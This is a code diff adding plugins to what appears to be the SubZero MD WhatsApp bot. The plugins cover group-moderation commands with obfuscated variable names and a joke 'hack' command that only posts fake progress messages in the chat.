'pattern': "opentime",
|
227 |
+
'react': '🔖',
|
228 |
+
'desc': "To open group to a time",
|
229 |
+
'category': "group",
|
230 |
+
'use': ".opentime",
|
231 |
+
'filename': __filename
|
232 |
+
}, async (_0x34b3eb, _0x420019, _0x39b627, {
|
233 |
+
from: _0x1979f2,
|
234 |
+
prefix: _0x7a8f6f,
|
235 |
+
l: _0x25c44a,
|
236 |
+
quoted: _0x379179,
|
237 |
+
body: _0x681d99,
|
238 |
+
isCmd: _0x4f96ba,
|
239 |
+
command: _0x3c87cf,
|
240 |
+
args: _0x3aae58,
|
241 |
+
q: _0x29755d,
|
242 |
+
isGroup: _0x18986c,
|
243 |
+
sender: _0x1eeef2,
|
244 |
+
senderNumber: _0x5e7c65,
|
245 |
+
botNumber2: _0x5dc97f,
|
246 |
+
botNumber: _0x7cbf18,
|
247 |
+
pushname: _0x10e0d4,
|
248 |
+
isMe: _0x40fd80,
|
249 |
+
isOwner: _0x34432b,
|
250 |
+
groupMetadata: _0x53257c,
|
251 |
+
groupName: _0x582d96,
|
252 |
+
participants: _0x5b6051,
|
253 |
+
groupAdmins: _0x507027,
|
254 |
+
isBotAdmins: _0x480a94,
|
255 |
+
isAdmins: _0x186a74,
|
256 |
+
reply: _0x515443
|
257 |
+
}) => {
|
258 |
+
try {
|
259 |
+
if (!_0x18986c) {
|
260 |
+
return _0x515443(ONLGROUP);
|
261 |
+
}
|
262 |
+
if (!_0x186a74) {
|
263 |
+
return _0x515443(ADMIN);
|
264 |
+
}
|
265 |
+
if (_0x3aae58[0x1] == "second") {
|
266 |
+
var _0x57d309 = _0x3aae58[0x0] * "1000";
|
267 |
+
} else {
|
268 |
+
if (_0x3aae58[0x1] == "minute") {
|
269 |
+
var _0x57d309 = _0x3aae58[0x0] * "60000";
|
270 |
+
} else {
|
271 |
+
if (_0x3aae58[0x1] == 'hour') {
|
272 |
+
var _0x57d309 = _0x3aae58[0x0] * "3600000";
|
273 |
+
} else {
|
274 |
+
if (_0x3aae58[0x1] == 'day') {
|
275 |
+
var _0x57d309 = _0x3aae58[0x0] * "86400000";
|
276 |
+
} else {
|
277 |
+
return _0x515443("*select:*\nsecond\nminute\nhour\n\n*example*\n10 second");
|
278 |
+
}
|
279 |
+
}
|
280 |
+
}
|
281 |
+
}
|
282 |
+
_0x515443("Open time " + _0x29755d + " starting from now");
|
283 |
+
setTimeout(() => {
|
284 |
+
_0x34b3eb.groupSettingUpdate(_0x1979f2, "not_announcement");
|
285 |
+
_0x515443("> *🔔 Group Chat Automatically Opened By SubZero Bot*");
|
286 |
+
}, _0x57d309);
|
287 |
+
await _0x34b3eb.sendMessage(_0x1979f2, {
|
288 |
+
'react': {
|
289 |
+
'text': '✅',
|
290 |
+
'key': _0x420019.key
|
291 |
+
}
|
292 |
+
});
|
293 |
+
} catch (_0x36d0c6) {
|
294 |
+
_0x515443("*Error !!*");
|
295 |
+
_0x25c44a(_0x36d0c6);
|
296 |
+
}
|
297 |
+
});
|
298 |
+
cmd({
|
299 |
+
'pattern': "closetime",
|
300 |
+
'react': '🔖',
|
301 |
+
'desc': "To close group to a time",
|
302 |
+
'category': "group",
|
303 |
+
'use': ".closstime",
|
304 |
+
'filename': __filename
|
305 |
+
}, async (_0x33bbc7, _0x1f2130, _0x578b2f, {
|
306 |
+
from: _0x152d4d,
|
307 |
+
prefix: _0xb42f24,
|
308 |
+
l: _0xbe8dbc,
|
309 |
+
quoted: _0x59c39b,
|
310 |
+
body: _0x40ea43,
|
311 |
+
isCmd: _0x2826d4,
|
312 |
+
command: _0x25218c,
|
313 |
+
args: _0x5b0123,
|
314 |
+
q: _0x490959,
|
315 |
+
isGroup: _0x369c33,
|
316 |
+
sender: _0x536754,
|
317 |
+
senderNumber: _0x226ae6,
|
318 |
+
botNumber2: _0x262160,
|
319 |
+
botNumber: _0x5de73e,
|
320 |
+
pushname: _0x25e051,
|
321 |
+
isMe: _0x5a41d6,
|
322 |
+
isOwner: _0x567b92,
|
323 |
+
groupMetadata: _0x3a3520,
|
324 |
+
groupName: _0xdac3e3,
|
325 |
+
participants: _0x29c2b6,
|
326 |
+
groupAdmins: _0x1d43ad,
|
327 |
+
isBotAdmins: _0x526454,
|
328 |
+
isAdmins: _0x526c9a,
|
329 |
+
reply: _0x5c514e
|
330 |
+
}) => {
|
331 |
+
try {
|
332 |
+
if (!_0x369c33) {
|
333 |
+
return _0x5c514e(ONLGROUP);
|
334 |
+
}
|
335 |
+
if (!_0x526c9a) {
|
336 |
+
return _0x5c514e(ADMIN);
|
337 |
+
}
|
338 |
+
if (_0x5b0123[0x1] == 'second') {
|
339 |
+
var _0x4b2fe4 = _0x5b0123[0x0] * "1000";
|
340 |
+
} else {
|
341 |
+
if (_0x5b0123[0x1] == "minute") {
|
342 |
+
var _0x4b2fe4 = _0x5b0123[0x0] * "60000";
|
343 |
+
} else {
|
344 |
+
if (_0x5b0123[0x1] == "hour") {
|
345 |
+
var _0x4b2fe4 = _0x5b0123[0x0] * "3600000";
|
346 |
+
} else {
|
347 |
+
if (_0x5b0123[0x1] == "day") {
|
348 |
+
var _0x4b2fe4 = _0x5b0123[0x0] * "86400000";
|
349 |
+
} else {
|
350 |
+
return _0x5c514e("*select:*\nsecond\nminute\nhour\n\n*Example*\n10 second");
|
351 |
+
}
|
352 |
+
}
|
353 |
+
}
|
354 |
+
}
|
355 |
+
_0x5c514e("Close time " + _0x490959 + " starting from now");
|
356 |
+
setTimeout(() => {
|
357 |
+
_0x33bbc7.groupSettingUpdate(_0x152d4d, "announcement");
|
358 |
+
_0x5c514e("> *🔕 Group Chat automatically closed by SubZero*");
|
359 |
+
}, _0x4b2fe4);
|
360 |
+
await _0x33bbc7.sendMessage(_0x152d4d, {
|
361 |
+
'react': {
|
362 |
+
'text': '✅',
|
363 |
+
'key': _0x1f2130.key
|
364 |
+
}
|
365 |
+
});
|
366 |
+
} catch (_0x4094cc) {
|
367 |
+
_0x5c514e("*Error !!*");
|
368 |
+
_0xbe8dbc(_0x4094cc);
|
369 |
+
}
|
370 |
+
});
|
371 |
+
cmd({
|
372 |
+
'pattern': 'tagadmin',
|
373 |
+
'alais': ["tagadmins"],
|
374 |
+
'react': '🙀',
|
375 |
+
'desc': "Tags all the admins in the group.",
|
376 |
+
'category': 'group',
|
377 |
+
'filename': __filename
|
378 |
+
}, async (_0x2180ae, _0x41ac32, _0x2e9138, {
|
379 |
+
from: _0x2616a,
|
380 |
+
prefix: _0xa4be17,
|
381 |
+
l: _0x11b560,
|
382 |
+
quoted: _0x2613b8,
|
383 |
+
body: _0x467a99,
|
384 |
+
isCmd: _0x38af41,
|
385 |
+
command: _0x159cc0,
|
386 |
+
args: _0x206a87,
|
387 |
+
q: _0x5a7094,
|
388 |
+
isGroup: _0x3fcba9,
|
389 |
+
sender: _0x2d33ad,
|
390 |
+
senderNumber: _0x2272d0,
|
391 |
+
botNumber2: _0x27bc6f,
|
392 |
+
botNumber: _0x428f22,
|
393 |
+
pushname: _0x1aed08,
|
394 |
+
isMe: _0x336ec0,
|
395 |
+
isOwner: _0x331a4d,
|
396 |
+
groupMetadata: _0x57c62a,
|
397 |
+
groupName: _0x3231a9,
|
398 |
+
participants: _0xe699,
|
399 |
+
groupAdmins: _0x53ccdc,
|
400 |
+
isBotAdmins: _0x4aa8ee,
|
401 |
+
isAdmins: _0x575128,
|
402 |
+
reply: _0x35f506
|
403 |
+
}) => {
|
404 |
+
try {
|
405 |
+
if (!_0x3fcba9) {
|
406 |
+
return _0x35f506("This command is only for groups.");
|
407 |
+
}
|
408 |
+
if (!_0x575128) {
|
409 |
+
return _0x35f506("Yah Command Srf Admins Ky Lya Hai !.");
|
410 |
+
}
|
411 |
+
if (_0x53ccdc.length === 0x0) {
|
412 |
+
return _0x35f506("There are no admins in this group.");
|
413 |
+
}
|
414 |
+
let _0x14ad67 = "*TAGGING ALL ADMINS IN THE GROUP 🔳:*\n\n";
|
415 |
+
for (let _0x166714 of _0x53ccdc) {
|
416 |
+
_0x14ad67 += '@' + _0x166714.split('@')[0x0] + "\n";
|
417 |
+
}
|
418 |
+
await _0x2180ae.sendMessage(_0x2616a, {
|
419 |
+
'text': _0x14ad67,
|
420 |
+
'mentions': _0x53ccdc
|
421 |
+
}, {
|
422 |
+
'quoted': _0x41ac32
|
423 |
+
});
|
424 |
+
} catch (_0x2a7fa0) {
|
425 |
+
console.error("Error tagging admins:", _0x2a7fa0);
|
426 |
+
_0x35f506("you are not an admin.");
|
427 |
+
}
|
428 |
+
});
|
429 |
+
cmd({
|
430 |
+
'pattern': "mute",
|
431 |
+
'alias': ["lock"],
|
432 |
+
'react': '🔒',
|
433 |
+
'desc': "mute group.",
|
434 |
+
'category': "group",
|
435 |
+
'filename': __filename
|
436 |
+
}, async (_0x188ee4, _0x2926d7, _0x5a0744, {
|
437 |
+
from: _0x1446bd,
|
438 |
+
l: _0x15ae12,
|
439 |
+
quoted: _0x11cce4,
|
440 |
+
body: _0x3901bf,
|
441 |
+
isCmd: _0x37eecc,
|
442 |
+
command: _0x2ed5f9,
|
443 |
+
args: _0x3b6b0a,
|
444 |
+
q: _0x7468c5,
|
445 |
+
isGroup: _0x3aa6ce,
|
446 |
+
sender: _0x1e204d,
|
447 |
+
senderNumber: _0x683c2e,
|
448 |
+
botNumber2: _0x26b4e2,
|
449 |
+
botNumber: _0x2ddb86,
|
450 |
+
pushname: _0x5c4eea,
|
451 |
+
isMe: _0x33a6e7,
|
452 |
+
isOwner: _0x39f686,
|
453 |
+
groupMetadata: _0x5aedcf,
|
454 |
+
groupName: _0x1026a0,
|
455 |
+
participants: _0x5e633e,
|
456 |
+
isItzcp: _0x4d966c,
|
457 |
+
groupAdmins: _0xa75e9a,
|
458 |
+
isBotAdmins: _0x5cd7fb,
|
459 |
+
isAdmins: _0x32b120,
|
460 |
+
reply: _0x4efac7
|
461 |
+
}) => {
|
462 |
+
try {
|
463 |
+
if (!_0x39f686 || !_0x32b120) {
|
464 |
+
return;
|
465 |
+
}
|
466 |
+
if (!_0x5a0744.isGroup) {
|
467 |
+
return _0x4efac7(mg.onlygroup);
|
468 |
+
}
|
469 |
+
if (!_0x5cd7fb) {
|
470 |
+
return _0x4efac7(mg.needbotadmins);
|
471 |
+
}
|
472 |
+
await _0x188ee4.groupSettingUpdate(_0x5a0744.chat, "announcement");
|
473 |
+
const _0x23264b = await _0x188ee4.sendMessage(_0x5a0744.chat, {
|
474 |
+
'text': "*GROUP CHAT MUTED BY SUBZERO-MD* 🔒"
|
475 |
+
}, {
|
476 |
+
'quoted': _0x2926d7
|
477 |
+
});
|
478 |
+
return await _0x188ee4.sendMessage(_0x5a0744.chat, {
|
479 |
+
'react': {
|
480 |
+
'text': '🔒',
|
481 |
+
'key': _0x23264b.key
|
482 |
+
}
|
483 |
+
});
|
484 |
+
} catch (_0x3ea7c2) {
|
485 |
+
console.log(_0x3ea7c2);
|
486 |
+
_0x4efac7("*Muja Admin Kar Pher Use Kar Commands ❗👻*");
|
487 |
+
}
|
488 |
+
});
|
489 |
+
cmd({
|
490 |
+
'pattern': "unmute",
|
491 |
+
'alias': ["unlock"],
|
492 |
+
'react': '🔓',
|
493 |
+
'desc': "unmute group.",
|
494 |
+
'category': "group",
|
495 |
+
'filename': __filename
|
496 |
+
}, async (_0x298fe1, _0x116d41, _0x2602ac, {
|
497 |
+
from: _0x15600e,
|
498 |
+
l: _0x5ba8bd,
|
499 |
+
quoted: _0x30a624,
|
500 |
+
body: _0x314dcd,
|
501 |
+
isCmd: _0x2536d0,
|
502 |
+
command: _0x3d9eb1,
|
503 |
+
args: _0x19ba22,
|
504 |
+
q: _0x3f0c3c,
|
505 |
+
isGroup: _0x4e57af,
|
506 |
+
sender: _0x597d49,
|
507 |
+
senderNumber: _0xda3f5a,
|
508 |
+
botNumber2: _0x2f023e,
|
509 |
+
botNumber: _0x1dd6f9,
|
510 |
+
pushname: _0x5320d4,
|
511 |
+
isMe: _0x48a143,
|
512 |
+
isOwner: _0x2cda60,
|
513 |
+
groupMetadata: _0x130d26,
|
514 |
+
groupName: _0x4593b5,
|
515 |
+
participants: _0x166fbf,
|
516 |
+
isItzcp: _0x310852,
|
517 |
+
groupAdmins: _0x2154a4,
|
518 |
+
isBotAdmins: _0x16ccf1,
|
519 |
+
isAdmins: _0x118e3c,
|
520 |
+
reply: _0x33fff7
|
521 |
+
}) => {
|
522 |
+
try {
|
523 |
+
if (!_0x2cda60 || !_0x118e3c) {
|
524 |
+
return;
|
525 |
+
}
|
526 |
+
if (!_0x2602ac.isGroup) {
|
527 |
+
return _0x33fff7(mg.onlygroup);
|
528 |
+
}
|
529 |
+
if (!_0x16ccf1) {
|
530 |
+
return _0x33fff7(mg.needbotadmins);
|
531 |
+
}
|
532 |
+
await _0x298fe1.groupSettingUpdate(_0x2602ac.chat, "not_announcement");
|
533 |
+
const _0x74b371 = await _0x298fe1.sendMessage(_0x2602ac.chat, {
|
534 |
+
'text': "*GROUP CHAT UNMUTED BY SUBZERO-MD* 🔒"
|
535 |
+
}, {
|
536 |
+
'quoted': _0x116d41
|
537 |
+
});
|
538 |
+
return await _0x298fe1.sendMessage(_0x2602ac.chat, {
|
539 |
+
'react': {
|
540 |
+
'text': '🔒',
|
541 |
+
'key': _0x74b371.key
|
542 |
+
}
|
543 |
+
});
|
544 |
+
} catch (_0x38466f) {
|
545 |
+
console.log(_0x38466f);
|
546 |
+
_0x33fff7("*Muja Admin Bana Phr Commands Kar❗👻*");
|
547 |
+
}
|
548 |
+
});
|
549 |
+
cmd({
|
550 |
+
'pattern': 'add',
|
551 |
+
'alias': ["aja"],
|
552 |
+
'react': '➕',
|
553 |
+
'desc': "Adds a user to the group.",
|
554 |
+
'category': 'group',
|
555 |
+
'filename': __filename,
|
556 |
+
'use': '<number>'
|
557 |
+
}, async (_0x29bcee, _0x5d8ef6, _0x56566a, {
|
558 |
+
from: _0x2d1d85,
|
559 |
+
quoted: _0x3437b0,
|
560 |
+
body: _0x212da3,
|
561 |
+
isCmd: _0x113379,
|
562 |
+
command: _0x4b5bf0,
|
563 |
+
args: _0xc1281a,
|
564 |
+
q: _0x58d6f4,
|
565 |
+
isGroup: _0x4e0892,
|
566 |
+
sender: _0xf93582,
|
567 |
+
senderNumber: _0x95b29f,
|
568 |
+
botNumber2: _0x558f84,
|
569 |
+
botNumber: _0x3571cd,
|
570 |
+
pushname: _0x19af4b,
|
571 |
+
isMe: _0x3ea7c4,
|
572 |
+
isOwner: _0x5c85af,
|
573 |
+
groupMetadata: _0x48378c,
|
574 |
+
groupName: _0x3827d6,
|
575 |
+
participants: _0x57e605,
|
576 |
+
groupAdmins: _0x4ddcc9,
|
577 |
+
isBotAdmins: _0x33dfec,
|
578 |
+
isAdmins: _0x4424ae,
|
579 |
+
reply: _0x227b1d
|
580 |
+
}) => {
|
581 |
+
try {
|
582 |
+
if (!_0x56566a.isGroup) {
|
583 |
+
return _0x227b1d("This command is only for groups.");
|
584 |
+
}
|
585 |
+
if (!_0x33dfec) {
|
586 |
+
return _0x227b1d("I need admin privileges to add users.");
|
587 |
+
}
|
588 |
+
if (!_0x58d6f4 || isNaN(_0x58d6f4)) {
|
589 |
+
return _0x227b1d("Please provide a valid phone number to add.");
|
590 |
+
}
|
591 |
+
const _0x362df9 = _0x58d6f4 + "@s.whatsapp.net";
|
592 |
+
await _0x29bcee.groupParticipantsUpdate(_0x56566a.chat, [_0x362df9], "add");
|
593 |
+
_0x227b1d("User " + _0x58d6f4 + " has been added to the group.");
|
594 |
+
} catch (_0x3f7309) {
|
595 |
+
console.error("Error adding user:", _0x3f7309);
|
596 |
+
_0x227b1d("An error occurred while adding the user. Please make sure the number is correct and they are not already in the group.");
|
597 |
+
}
|
598 |
+
});
|
599 |
+
cmd({
|
600 |
+
'pattern': "setgoodbye",
|
601 |
+
'desc': "Set the goodbye message for the group.",
|
602 |
+
'category': "group",
|
603 |
+
'react': '👋',
|
604 |
+
'filename': __filename
|
605 |
+
}, async (_0x51b23f, _0x21cb6a, _0x275d83, {
|
606 |
+
from: _0x3ffb4d,
|
607 |
+
quoted: _0x3f3f17,
|
608 |
+
body: _0x4550f2,
|
609 |
+
isCmd: _0x28286e,
|
610 |
+
command: _0x97137b,
|
611 |
+
args: _0x273812,
|
612 |
+
q: _0x5ebbc8,
|
613 |
+
isGroup: _0xb2710d,
|
614 |
+
sender: _0x421d81,
|
615 |
+
senderNumber: _0x16e90c,
|
616 |
+
botNumber2: _0x2369c2,
|
617 |
+
botNumber: _0x555438,
|
618 |
+
pushname: _0x4c8d4a,
|
619 |
+
isMe: _0x522db1,
|
620 |
+
isOwner: _0x1db872,
|
621 |
+
groupMetadata: _0x212b3d,
|
622 |
+
groupName: _0x3d71b8,
|
623 |
+
participants: _0x4da364,
|
624 |
+
groupAdmins: _0x1a2b40,
|
625 |
+
isBotAdmins: _0xf475c2,
|
626 |
+
isAdmins: _0x533cde,
|
627 |
+
reply: _0x4beca6
|
628 |
+
}) => {
|
629 |
+
try {
|
630 |
+
if (!_0xb2710d) {
|
631 |
+
return _0x4beca6("This command can only be used in a group.");
|
632 |
+
}
|
633 |
+
if (!_0xf475c2) {
|
634 |
+
return _0x4beca6("Bot must be an admin to use this command.");
|
635 |
+
}
|
636 |
+
if (!_0x533cde) {
|
637 |
+
return _0x4beca6("You must be an admin to use this command.");
|
638 |
+
}
|
639 |
+
if (!_0x5ebbc8) {
|
640 |
+
return _0x4beca6("Please provide a goodbye message.");
|
641 |
+
}
|
642 |
+
await _0x51b23f.sendMessage(_0x3ffb4d, {
|
643 |
+
'image': {
|
644 |
+
'url': config.ALIVE_IMG
|
645 |
+
},
|
646 |
+
'caption': _0x5ebbc8
|
647 |
+
});
|
648 |
+
await _0x4beca6("Goodbye message has been set.");
|
649 |
+
} catch (_0xbbddb1) {
|
650 |
+
console.log(_0xbbddb1);
|
651 |
+
_0x4beca6('' + _0xbbddb1);
|
652 |
+
}
|
653 |
+
});
|
654 |
+
cmd({
|
655 |
+
'pattern': "setwelcome",
|
656 |
+
'desc': "Set the welcome message for the group.",
|
657 |
+
'category': "group",
|
658 |
+
'react': '👋',
|
659 |
+
'filename': __filename
|
660 |
+
}, async (_0x38c266, _0x3173c4, _0x390a75, {
|
661 |
+
from: _0x3f6a31,
|
662 |
+
quoted: _0x28a99e,
|
663 |
+
body: _0x4ed0ca,
|
664 |
+
isCmd: _0x4d0fa4,
|
665 |
+
command: _0x400fb2,
|
666 |
+
args: _0x3a8f9f,
|
667 |
+
q: _0xd0a608,
|
668 |
+
isGroup: _0x519fe5,
|
669 |
+
sender: _0x19d08d,
|
670 |
+
senderNumber: _0x4b3863,
|
671 |
+
botNumber2: _0x1aaac2,
|
672 |
+
botNumber: _0x5e81eb,
|
673 |
+
pushname: _0x37028a,
|
674 |
+
isMe: _0x2af145,
|
675 |
+
isOwner: _0x5060d5,
|
676 |
+
groupMetadata: _0x1378de,
|
677 |
+
groupName: _0x463238,
|
678 |
+
participants: _0x31482b,
|
679 |
+
groupAdmins: _0x5cc3cc,
|
680 |
+
isBotAdmins: _0x12d593,
|
681 |
+
isAdmins: _0x35af97,
|
682 |
+
reply: _0x4c430b
|
683 |
+
}) => {
|
684 |
+
try {
|
685 |
+
if (!_0x519fe5) {
|
686 |
+
return _0x4c430b("This command can only be used in a group.");
|
687 |
+
}
|
688 |
+
if (!_0x12d593) {
|
689 |
+
return _0x4c430b("Bot must be an admin to use this command.");
|
690 |
+
}
|
691 |
+
if (!_0x35af97) {
|
692 |
+
return _0x4c430b("You must be an admin to use this command.");
|
693 |
+
}
|
694 |
+
if (!_0xd0a608) {
|
695 |
+
return _0x4c430b("Please provide a welcome message.");
|
696 |
+
}
|
697 |
+
await _0x38c266.sendMessage(_0x3f6a31, {
|
698 |
+
'image': {
|
699 |
+
'url': config.ALIVE_IMG
|
700 |
+
},
|
701 |
+
'caption': _0xd0a608
|
702 |
+
});
|
703 |
+
await _0x4c430b("Welcome message has been set.");
|
704 |
+
} catch (_0x416d4f) {
|
705 |
+
console.log(_0x416d4f);
|
706 |
+
_0x4c430b('' + _0x416d4f);
|
707 |
+
}
|
708 |
+
});
|
plugins/hack-prank.js
ADDED
@@ -0,0 +1,266 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
1 |
+
/*
|
2 |
+
|
3 |
+
$$$$$$\ $$\
|
4 |
+
$$ __$$\ $$ |
|
5 |
+
$$ / \__|$$\ $$\ $$$$$$$\ $$$$$$$$\ $$$$$$\ $$$$$$\ $$$$$$\
|
6 |
+
\$$$$$$\ $$ | $$ |$$ __$$\ \____$$ |$$ __$$\ $$ __$$\ $$ __$$\
|
7 |
+
\____$$\ $$ | $$ |$$ | $$ | $$$$ _/ $$$$$$$$ |$$ | \__|$$ / $$ |
|
8 |
+
$$\ $$ |$$ | $$ |$$ | $$ | $$ _/ $$ ____|$$ | $$ | $$ |
|
9 |
+
\$$$$$$ |\$$$$$$ |$$$$$$$ |$$$$$$$$\ \$$$$$$$\ $$ | \$$$$$$ |
|
10 |
+
\______/ \______/ \_______/ \________| \_______|\__| \______/
|
11 |
+
|
12 |
+
Project Name : SubZero MD
|
13 |
+
Creator : Darrell Mucheri ( Mr Frank OFC )
|
14 |
+
Repo : https//github.com/mrfrank-ofc/SUBZERO-MD
|
15 |
+
Support : wa.me/18062212660
|
16 |
+
*/
|
17 |
+
|
18 |
+
|
19 |
+
|
20 |
+
|
21 |
+
|
22 |
+
|
23 |
+
|
24 |
+
|
25 |
+
|
26 |
+
|
27 |
+
|
28 |
+
|
29 |
+
|
30 |
+
|
31 |
+
|
32 |
+
|
33 |
+
|
34 |
+
|
35 |
+
|
36 |
+
|
37 |
+
|
38 |
+
|
39 |
+
|
40 |
+
|
41 |
+
|
42 |
+
|
43 |
+
|
44 |
+
|
45 |
+
|
46 |
+
|
47 |
+
|
48 |
+
|
49 |
+
|
50 |
+
|
51 |
+
|
52 |
+
|
53 |
+
|
54 |
+
|
55 |
+
|
56 |
+
|
57 |
+
|
58 |
+
|
59 |
+
|
60 |
+
|
61 |
+
|
62 |
+
|
63 |
+
|
64 |
+
|
65 |
+
|
66 |
+
|
67 |
+
|
68 |
+
|
69 |
+
|
70 |
+
|
71 |
+
|
72 |
+
|
73 |
+
|
74 |
+
|
75 |
+
|
76 |
+
|
77 |
+
|
78 |
+
|
79 |
+
|
80 |
+
|
81 |
+
|
82 |
+
|
83 |
+
|
84 |
+
|
85 |
+
|
86 |
+
|
87 |
+
|
88 |
+
|
89 |
+
|
90 |
+
|
91 |
+
|
92 |
+
|
93 |
+
|
94 |
+
|
95 |
+
|
96 |
+
|
97 |
+
|
98 |
+
|
99 |
+
|
100 |
+
|
101 |
+
|
102 |
+
|
103 |
+
|
104 |
+
|
105 |
+
|
106 |
+
|
107 |
+
|
108 |
+
|
109 |
+
|
110 |
+
|
111 |
+
|
112 |
+
|
113 |
+
|
114 |
+
|
115 |
+
|
116 |
+
|
117 |
+
|
118 |
+
|
119 |
+
|
120 |
+
|
121 |
+
|
122 |
+
|
123 |
+
|
124 |
+
|
125 |
+
|
126 |
+
|
127 |
+
|
128 |
+
|
129 |
+
|
130 |
+
|
131 |
+
|
132 |
+
|
133 |
+
|
134 |
+
|
135 |
+
|
136 |
+
|
137 |
+
|
138 |
+
|
139 |
+
|
140 |
+
|
141 |
+
|
142 |
+
|
143 |
+
|
144 |
+
|
145 |
+
|
146 |
+
|
147 |
+
|
148 |
+
|
149 |
+
|
150 |
+
|
151 |
+
|
152 |
+
|
153 |
+
|
154 |
+
|
155 |
+
|
156 |
+
|
157 |
+
|
158 |
+
|
159 |
+
|
160 |
+
|
161 |
+
|
162 |
+
|
163 |
+
|
164 |
+
|
165 |
+
|
166 |
+
|
167 |
+
|
168 |
+
|
169 |
+
|
170 |
+
|
171 |
+
|
172 |
+
|
173 |
+
|
174 |
+
|
175 |
+
|
176 |
+
|
177 |
+
|
178 |
+
|
179 |
+
|
180 |
+
|
181 |
+
|
182 |
+
|
183 |
+
|
184 |
+
|
185 |
+
|
186 |
+
|
187 |
+
|
188 |
+
|
189 |
+
|
190 |
+
|
191 |
+
|
192 |
+
|
193 |
+
|
194 |
+
|
195 |
+
|
196 |
+
|
197 |
+
|
198 |
+
|
199 |
+
|
200 |
+
|
201 |
+
|
202 |
+
|
203 |
+
|
204 |
+
|
205 |
+
|
206 |
+
|
207 |
+
|
208 |
+
|
209 |
+
|
210 |
+
|
211 |
+
|
212 |
+
|
213 |
+
|
214 |
+
|
215 |
+
|
216 |
+
|
217 |
+
const { cmd } = require('../command');
|
218 |
+
|
219 |
+
cmd({
|
220 |
+
pattern: "hack",
|
221 |
+
desc: "Displays a dynamic and playful 'Hacking' message for fun.",
|
222 |
+
category: "fun",
|
223 |
+
react: "💻",
|
224 |
+
filename: __filename
|
225 |
+
},
|
226 |
+
async (conn, mek, m, { from, quoted, body, isCmd, command, args, q, isGroup, sender, senderNumber, botNumber2, botNumber, pushname, isMe, isOwner, groupMetadata, groupName, participants, groupAdmins, isBotAdmins, isAdmins, reply }) => {
|
227 |
+
try {
|
228 |
+
const steps = [
|
229 |
+
'💻 *SUBZERO HACK STARTING...* 💻',
|
230 |
+
'',
|
231 |
+
'*Initializing hacking tools...* 🛠️',
|
232 |
+
'*Connecting to remote servers...* 🌐',
|
233 |
+
'',
|
234 |
+
'```[██████████] 10%``` ⏳' ,
|
235 |
+
'```[███████████████████] 20%``` ⏳' ,
|
236 |
+
'```[███████████████████████] 30%``` ⏳' ,
|
237 |
+
'```[██████████████████████████] 40%``` ⏳' ,
|
238 |
+
'```[███████████████████████████████] 50%``` ⏳' ,
|
239 |
+
'```[█████████████████████████████████████] 60%``` ⏳' ,
|
240 |
+
'```[██████████████████████████████████████████] 70%``` ⏳' ,
|
241 |
+
'```[██████████████████████████████████████████████] 80%``` ⏳' ,
|
242 |
+
'```[██████████████████████████████████████████████████] 90%``` ⏳' ,
|
243 |
+
'```[████████████████████████████████████████████████████] 100%``` ✅',
|
244 |
+
'',
|
245 |
+
'🔒 *System Breach: Successful!* 🔓',
|
246 |
+
'🚀 *Command Execution: Complete!* 🎯',
|
247 |
+
'',
|
248 |
+
'*📡 Transmitting data...* 📤',
|
249 |
+
'_🕵️♂️ Ensuring stealth..._ 🤫',
|
250 |
+
'*🔧 Finalizing operations...* 🏁',
|
251 |
+
'',
|
252 |
+
'⚠️ *Note:* All actions are for demonstration purposes only.',
|
253 |
+
'⚠️ *Reminder:* Ethical hacking is the only way to ensure security.',
|
254 |
+
'',
|
255 |
+
'> *SUBZERO-HACKING-COMPLETE ☣*'
|
256 |
+
];
|
257 |
+
|
258 |
+
for (const line of steps) {
|
259 |
+
await conn.sendMessage(from, { text: line }, { quoted: mek });
|
260 |
+
await new Promise(resolve => setTimeout(resolve, 1000)); // Adjust the delay as needed
|
261 |
+
}
|
262 |
+
} catch (e) {
|
263 |
+
console.log(e);
|
264 |
+
reply(`❌ *Error:* ${e.message}`);
|
265 |
+
}
|
266 |
+
});
|
plugins/main-about.js
ADDED
@@ -0,0 +1,226 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
